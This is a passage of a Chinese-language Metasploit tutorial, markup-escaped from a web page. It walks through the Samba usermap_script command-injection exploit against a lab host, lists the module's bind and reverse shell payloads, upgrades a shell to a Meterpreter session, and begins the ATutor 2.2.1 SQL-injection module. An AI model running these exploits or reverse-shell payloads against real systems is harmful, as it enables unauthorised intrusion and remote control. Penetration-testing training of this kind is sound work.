                              Samba<\/code>\u662f\u7528\u4e8eLinux<\/code>\u548cWindows<\/code>\u4e4b\u95f4\u7684\u6253\u5370\u548c\u6587\u4ef6\u5171\u4eab\u7684\u670d\u52a1\u3002Samba 3.0.0<\/code>\u81f33.0.25rc3<\/code>\u7684smbd<\/code>\u4e2d\u7684MS-RPC<\/code>\u529f\u80fd\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u901a\u8fc7SamrChangePassword<\/code>\u529f\u80fd\u7684shell<\/code>\u5143\u5b57\u7b26\u6267\u884c\u4efb\u610f\u547d\u4ee4\uff0c\u5f53\u542f\u7528smb.conf<\/code>\u4e2d\u201c\u7528\u6237\u540d\u6620\u5c04\u811a\u672c\u201d\u9009\u9879\u65f6(\u4e0d\u662f\u9ed8\u8ba4\u542f\u7528\u7684)\uff0c\u5141\u8bb8\u8fdc\u7a0b\u8ba4\u8bc1\u7684\u7528\u6237\u901a\u8fc7\u8fdc\u7a0b\u6253\u5370\u673a\u4e2d\u7684\u5176\u4ed6MS-RPC<\/code>\u529f\u80fd\u7684\u5916\u90e8\u5143\u5b57\u7b26\u6267\u884c\u547d\u4ee4\uff0c\u4ee5\u53ca\u6587\u4ef6\u5171\u4eab\u7ba1\u7406\u3002\u8be5\u6f0f\u6d1e\u653b\u51fb\u6a21\u5757\u901a\u8fc7\u6307\u5b9a\u4e00\u4e2a\u7528\u6237\u540d\u5305\u542bshell<\/code>\u5143\u5b57\u7b26,\u653b\u51fb\u8005\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002 \u56e0\u4e3a\u6b64\u9009\u9879\u7528\u4e8e\u5728\u8eab\u4efd\u9a8c\u8bc1\u4e4b\u524d\u6620\u5c04\u7528\u6237\u540d\uff0c\u6240\u4ee5\u4e0d\u9700\u8981\u8eab\u4efd\u9a8c\u8bc1\u5c31\u53ef\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u3002<\/p>\n
                              \u6709\u6548\u653b\u51fb\u8f7d\u8377\uff1f<\/h5>\n
                              \u6211\u4eec\u6ca1\u6709\u6307\u5b9apayload<\/code>\uff0c\u6240\u4ee5Metasploit<\/code>\u9ed8\u8ba4\u4e3a\u6211\u4eec\u6307\u5b9a\u4e86payload<\/code>\u3002\u6211\u4eec\u53ef\u7528show options<\/code>\u67e5\u770b<\/p>\n
                              <\/code><\/pre>\n
                                \n
                              1. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span> show<\/span> options<\/span><\/div>\n<\/div>\n<\/li>\n
                              2. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              3. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                Module<\/span> options<\/span> (exploit\/multi\/samba\/usermap_script):<\/span><\/div>\n<\/div>\n<\/li>\n
                              4. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              5. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                Name<\/span> Current<\/span> Setting<\/span> Required<\/span> Description<\/span><\/div>\n<\/div>\n<\/li>\n
                              6. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                ----<\/span> ---------------<\/span> --------<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                              7. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                RHOSTS<\/span> 192.168<\/span>.177<\/span>.145<\/span> yes<\/span> The<\/span> target<\/span> address<\/span> range<\/span> or<\/span> CIDR<\/span> identifier<\/span><\/div>\n<\/div>\n<\/li>\n
                              8. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                RPORT<\/span> 139<\/span> yes<\/span> The<\/span> target<\/span> port<\/span> (TCP)<\/span><\/div>\n<\/div>\n<\/li>\n
                              9. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              10. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              11. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                Payload<\/span> options<\/span> (cmd\/unix\/reverse):<\/span><\/div>\n<\/div>\n<\/li>\n
                              12. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              13. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                Name<\/span> Current<\/span> Setting<\/span> Required<\/span> Description<\/span><\/div>\n<\/div>\n<\/li>\n
                              14. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                ----<\/span> ---------------<\/span> --------<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                              15. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                LHOST<\/span> 192.168<\/span>.177<\/span>.143<\/span> yes<\/span> The<\/span> listen<\/span> address<\/span> (an<\/span> interface<\/span> may<\/span> be<\/span> specified)<\/span><\/div>\n<\/div>\n<\/li>\n
                              16. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                LPORT<\/span> 4444 <\/span>yes<\/span> The<\/span> listen<\/span> port<\/span><\/div>\n<\/div>\n<\/li>\n
                              17. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              18. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              19. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                Exploit target:<\/span><\/div>\n<\/div>\n<\/li>\n
                              20. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              21. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                Id<\/span> Name<\/span><\/div>\n<\/div>\n<\/li>\n
                              22. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                --<\/span> ----<\/span><\/div>\n<\/div>\n<\/li>\n
                              23. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                0<\/span> Automatic<\/span><\/div>\n<\/div>\n<\/li>\n
                              24. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              25. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                <\/div>\n<\/div>\n<\/li>\n
                              26. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                              27. \n
                                \n
                                <\/div>\n<\/div>\n
                                \n
                                \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                <\/code><\/pre>\n
                                \u53ef\u4ee5\u770b\u5230\uff0c\u4f7f\u7528\u7684payload<\/code>\u662f\u4e00\u4e2aunix<\/code>\u53cd\u5411shell<\/code>\u3002<\/p>\n
                                \u6211\u4eec\u53ef\u4ee5\u901a\u8fc7show payloas<\/code>\u5217\u51fa\u5f53\u524d\u653b\u51fb\u6a21\u5757\u6240\u6709\u53ef\u7528\u7684\u653b\u51fb\u8f7d\u8377\u3002<\/p>\n
                                <\/code><\/pre>\n
                                  \n
                                1. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span> show<\/span> payloads<\/span><\/div>\n<\/div>\n<\/li>\n
                                2. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  <\/div>\n<\/div>\n<\/li>\n
                                3. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  Compatible<\/span> Payloads<\/span><\/div>\n<\/div>\n<\/li>\n
                                4. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  ===================<\/span><\/div>\n<\/div>\n<\/li>\n
                                5. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  <\/div>\n<\/div>\n<\/li>\n
                                6. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  # Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n
                                7. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  -<\/span> ----<\/span> ---------------<\/span> ----<\/span> -----<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                                8. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  1<\/span> cmd\/unix\/bind_awk<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> AWK)<\/span><\/div>\n<\/div>\n<\/li>\n
                                9. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  2<\/span> cmd\/unix\/bind_busybox_telnetd<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> BusyBox<\/span> telnetd)<\/span><\/div>\n<\/div>\n<\/li>\n
                                10. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  3<\/span> cmd\/unix\/bind_inetd<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (inetd)<\/span><\/div>\n<\/div>\n<\/li>\n
                                11. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  4<\/span> cmd\/unix\/bind_lua<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> Lua)<\/span><\/div>\n<\/div>\n<\/li>\n
                                12. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  5<\/span> cmd\/unix\/bind_netcat<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> netcat)<\/span><\/div>\n<\/div>\n<\/li>\n
                                13. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  6<\/span> cmd\/unix\/bind_netcat_gaping<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> netcat<\/span> -e)<\/span><\/div>\n<\/div>\n<\/li>\n
                                14. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  7<\/span> cmd\/unix\/bind_netcat_gaping_ipv6<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> netcat<\/span> -e)<\/span> IPv6<\/span><\/div>\n<\/div>\n<\/li>\n
                                15. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  8<\/span> cmd\/unix\/bind_perl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> Perl)<\/span><\/div>\n<\/div>\n<\/li>\n
                                16. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  9<\/span> cmd\/unix\/bind_perl_ipv6<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> perl)<\/span> IPv6<\/span><\/div>\n<\/div>\n<\/li>\n
                                17. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  10<\/span> cmd\/unix\/bind_r<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> R)<\/span><\/div>\n<\/div>\n<\/li>\n
                                18. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  11<\/span> cmd\/unix\/bind_ruby<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> Ruby)<\/span><\/div>\n<\/div>\n<\/li>\n
                                19. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  12<\/span> cmd\/unix\/bind_ruby_ipv6<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> Ruby)<\/span> IPv6<\/span><\/div>\n<\/div>\n<\/li>\n
                                20. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  13<\/span> cmd\/unix\/bind_socat_udp<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> UDP<\/span> (via<\/span> socat)<\/span><\/div>\n<\/div>\n<\/li>\n
                                21. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  14<\/span> cmd\/unix\/bind_zsh<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Bind<\/span> TCP<\/span> (via<\/span> Zsh)<\/span><\/div>\n<\/div>\n<\/li>\n
                                22. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  15<\/span> cmd\/unix\/generic<\/span> normal<\/span> No<\/span> Unix<\/span> Command,<\/span> Generic<\/span> Command<\/span> Execution<\/span><\/div>\n<\/div>\n<\/li>\n
                                23. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  16<\/span> cmd\/unix\/reverse<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Double<\/span> Reverse<\/span> TCP<\/span> (telnet)<\/span><\/div>\n<\/div>\n<\/li>\n
                                24. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  17<\/span> cmd\/unix\/reverse_awk<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> AWK)<\/span><\/div>\n<\/div>\n<\/li>\n
                                25. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  18<\/span> cmd\/unix\/reverse_bash_telnet_ssl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> SSL<\/span> (telnet)<\/span><\/div>\n<\/div>\n<\/li>\n
                                26. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  19<\/span> cmd\/unix\/reverse_ksh<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> Ksh)<\/span><\/div>\n<\/div>\n<\/li>\n
                                27. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  20<\/span> cmd\/unix\/reverse_lua<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> Lua)<\/span><\/div>\n<\/div>\n<\/li>\n
                                28. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  21<\/span> cmd\/unix\/reverse_ncat_ssl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> ncat)<\/span><\/div>\n<\/div>\n<\/li>\n
                                29. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  22<\/span> cmd\/unix\/reverse_netcat<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> netcat)<\/span><\/div>\n<\/div>\n<\/li>\n
                                30. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  23<\/span> cmd\/unix\/reverse_netcat_gaping<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> netcat<\/span> -e)<\/span><\/div>\n<\/div>\n<\/li>\n
                                31. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  24<\/span> cmd\/unix\/reverse_openssl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Double<\/span> Reverse<\/span> TCP<\/span> SSL<\/span> (openssl)<\/span><\/div>\n<\/div>\n<\/li>\n
                                32. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  25<\/span> cmd\/unix\/reverse_perl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> Perl)<\/span><\/div>\n<\/div>\n<\/li>\n
                                33. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  26<\/span> cmd\/unix\/reverse_perl_ssl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> SSL<\/span> (via<\/span> perl)<\/span><\/div>\n<\/div>\n<\/li>\n
                                34. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  27<\/span> cmd\/unix\/reverse_php_ssl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> SSL<\/span> (via<\/span> php)<\/span><\/div>\n<\/div>\n<\/li>\n
                                35. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  28<\/span> cmd\/unix\/reverse_python<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> Python)<\/span><\/div>\n<\/div>\n<\/li>\n
                                36. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  29<\/span> cmd\/unix\/reverse_python_ssl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> SSL<\/span> (via<\/span> python)<\/span><\/div>\n<\/div>\n<\/li>\n
                                37. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  30<\/span> cmd\/unix\/reverse_r<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> R)<\/span><\/div>\n<\/div>\n<\/li>\n
                                38. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  31<\/span> cmd\/unix\/reverse_ruby<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> Ruby)<\/span><\/div>\n<\/div>\n<\/li>\n
                                39. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  32<\/span> cmd\/unix\/reverse_ruby_ssl<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> SSL<\/span> (via<\/span> Ruby)<\/span><\/div>\n<\/div>\n<\/li>\n
                                40. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  33<\/span> cmd\/unix\/reverse_socat_udp<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> UDP<\/span> (via<\/span> socat)<\/span><\/div>\n<\/div>\n<\/li>\n
                                41. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  34<\/span> cmd\/unix\/reverse_ssl_double_telnet<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Double<\/span> Reverse<\/span> TCP<\/span> SSL<\/span> (telnet)<\/span><\/div>\n<\/div>\n<\/li>\n
                                42. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  35<\/span> cmd\/unix\/reverse_zsh<\/span> normal<\/span> No<\/span> Unix<\/span> Command<\/span> Shell,<\/span> Reverse<\/span> TCP<\/span> (via<\/span> Zsh)<\/span><\/div>\n<\/div>\n<\/li>\n
                                43. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  <\/div>\n<\/div>\n<\/li>\n
                                44. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                45. \n
                                  \n
                                  <\/div>\n<\/div>\n
                                  \n
                                  \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                  <\/code><\/pre>\n
                                  \u6211\u4eec\u8fd8\u53ef\u4ee5\u901a\u8fc7sessions -u [sessions_id]<\/code>\u00a0\u53ef\u4ee5\u5c06shell<\/code>\u4f1a\u8bdd\u5347\u7ea7\u6210meterpreter<\/code>\u4f1a\u8bdd\uff0c\u4ece\u800c\u53ef\u4ee5\u5229\u7528meterpreter<\/code>\u7684\u9ad8\u7ea7\u529f\u80fd\u3002\u5173\u4e8emeterpreter<\/code>\u4f1a\u5728\u540e\u7eed\u7684\u7ae0\u8282\u4e2d\u8be6\u7ec6\u8bb2\u89e3\u3002<\/p>\n
                                  <\/code><\/pre>\n
                                    \n
                                  1. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    msf5<\/span> exploit(multi\/samba\/usermap_script)<\/span> ><\/span> sessions<\/span> -u<\/span> 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                  2. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    [*<\/span>] Executing<\/span> 'post\/multi\/manage\/shell_to_meterpreter'<\/span> on<\/span> session(s):<\/span> [2<\/span>]<\/div>\n<\/div>\n<\/li>\n
                                  3. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    <\/div>\n<\/div>\n<\/li>\n
                                  4. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    [*<\/span>] Upgrading session ID:<\/span> 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                  5. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    [*<\/span>] Starting<\/span> exploit\/multi\/handler<\/span><\/div>\n<\/div>\n<\/li>\n
                                  6. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4433<\/span><\/div>\n<\/div>\n<\/li>\n
                                  7. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    [*<\/span>] Sending<\/span> stage<\/span> (985320<\/span> bytes)<\/span> to<\/span> 192.168<\/span>.177<\/span>.145<\/span><\/div>\n<\/div>\n<\/li>\n
                                  8. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    [*<\/span>] Meterpreter<\/span> session<\/span> 3<\/span> opened<\/span> (192.168.177.143:4433<\/span> -><\/span> 192.168<\/span>.177<\/span>.145<\/span>:35189)<\/span> at<\/span> 2019-04-26 13:46:35<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                  9. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    [*<\/span>] Command stager progress:<\/span> 100.00<\/span>%<\/span> (773\/773<\/span> bytes)<\/span><\/div>\n<\/div>\n<\/li>\n
                                  10. \n
                                    \n
                                    <\/div>\n<\/div>\n
                                    \n
                                    \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                    <\/code><\/pre>\n
                                    2\u3001SQL \u6ce8\u5165<\/h4>\n
                                    Metasploit<\/code>\u6709\u51e0\u4e2aSQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\u7684\u5229\u7528\u6a21\u5757\uff0c\u4f7f\u6211\u4eec\u80fd\u591f\u6d4b\u8bd5\u548c\u9a8c\u8bc1\u76ee\u6807\u662f\u5426\u6613\u53d7\u653b\u51fb\u3002<\/p>\n
                                    \u51c6\u5907\u5de5\u4f5c<\/h5>\n
                                    \u6211\u4eec\u5c06\u5b89\u88c5\u4e00\u4e2a\u6613\u53d7\u653b\u51fb\u7684\u5f00\u6e90LMS\uff1aAtutor 2.2.1<\/code>\u8fdb\u884c\u6d4b\u8bd5\uff0c\u8bbf\u95eewww.exploit-db.com\/exploits\/39\u2026<\/a>\u00a0\uff0c\u70b9\u51fbVULNERABLE APP<\/code>\u65c1\u8fb9\u7684\u4e0b\u8f7d\u6309\u94ae\u5f00\u6e90\u4e0b\u8f7dAtutor 2.2.1<\/code>\u3002<\/p>\n
                                    <\/figcaption><\/figure>\n
                                    TIP\uff1a\u81f3\u4e8e\u600e\u4e48\u5b89\u88c5\u00a0ATutor<\/code>\uff0c\u53ef\u4ee5\u67e5\u770b\u5b98\u65b9\u6587\u6863\u3002<\/p>\n
                                    \u600e\u4e48\u505a<\/h5>\n
                                    \u8be5\u6a21\u5757\u5229\u7528\u4e86ATutor 2.2.1<\/code>\u7684SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\u548c\u8eab\u4efd\u9a8c\u8bc1\u6f0f\u6d1e\uff0c\u8fd9\u610f\u5473\u7740\u6211\u4eec\u53ef\u4ee5\u7ed5\u8fc7\u8eab\u4efd\u9a8c\u8bc1\uff0c\u8bbf\u95ee\u7ba1\u7406\u63a5\u53e3\uff0c\u4e0a\u4f20\u6076\u610f\u4ee3\u7801\u3002<\/p>\n
                                    1\u3001\u4f7f\u7528exploit\/multi\/http\/atutor_sqli<\/code>\u6a21\u5757\uff0c\u67e5\u770b\u6a21\u5757\u9009\u9879<\/p>\n
                                    <\/code><\/pre>\n
                                      \n
                                    1. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      msf5<\/span> ><\/span> use<\/span> exploit\/multi\/http\/atutor_sqli<\/span><\/div>\n<\/div>\n<\/li>\n
                                    2. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span> show<\/span> options<\/span><\/div>\n<\/div>\n<\/li>\n
                                    3. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      <\/div>\n<\/div>\n<\/li>\n
                                    4. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      Module<\/span> options<\/span> (exploit\/multi\/http\/atutor_sqli):<\/span><\/div>\n<\/div>\n<\/li>\n
                                    5. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      <\/div>\n<\/div>\n<\/li>\n
                                    6. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      Name<\/span> Current<\/span> Setting<\/span> Required<\/span> Description<\/span><\/div>\n<\/div>\n<\/li>\n
                                    7. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      ----<\/span> ---------------<\/span> --------<\/span> -----------<\/span><\/div>\n<\/div>\n<\/li>\n
                                    8. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      Proxies<\/span> no<\/span> A<\/span> proxy<\/span> chain<\/span> of<\/span> format<\/span> type:host:port[,type:host:port][...]<\/span><\/div>\n<\/div>\n<\/li>\n
                                    9. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      RHOSTS<\/span> yes<\/span> The<\/span> target<\/span> address<\/span> range<\/span> or<\/span> CIDR<\/span> identifier<\/span><\/div>\n<\/div>\n<\/li>\n
                                    10. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      RPORT<\/span> 80<\/span> yes<\/span> The<\/span> target<\/span> port<\/span> (TCP)<\/span><\/div>\n<\/div>\n<\/li>\n
                                    11. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      SSL<\/span> false<\/span> no<\/span> Negotiate<\/span> SSL\/TLS<\/span> for<\/span> outgoing<\/span> connections<\/span><\/div>\n<\/div>\n<\/li>\n
                                    12. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      TARGETURI<\/span> \/ATutor\/<\/span> yes<\/span> The<\/span> path<\/span> of<\/span> Atutor<\/span><\/div>\n<\/div>\n<\/li>\n
                                    13. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      VHOST<\/span> no<\/span> HTTP<\/span> server<\/span> virtual<\/span> host<\/span><\/div>\n<\/div>\n<\/li>\n
                                    14. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      <\/div>\n<\/div>\n<\/li>\n
                                    15. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      <\/div>\n<\/div>\n<\/li>\n
                                    16. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      Exploit target:<\/span><\/div>\n<\/div>\n<\/li>\n
                                    17. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      <\/div>\n<\/div>\n<\/li>\n
                                    18. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      Id<\/span> Name<\/span><\/div>\n<\/div>\n<\/li>\n
                                    19. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      --<\/span> ----<\/span><\/div>\n<\/div>\n<\/li>\n
                                    20. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      0<\/span> Automatic<\/span><\/div>\n<\/div>\n<\/li>\n
                                    21. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      <\/div>\n<\/div>\n<\/li>\n
                                    22. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      <\/div>\n<\/div>\n<\/li>\n
                                    23. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      msf5<\/span> exploit(multi\/http\/atutor_sqli)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                    24. \n
                                      \n
                                      <\/div>\n<\/div>\n
                                      \n
                                      \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                      <\/code><\/pre>\n
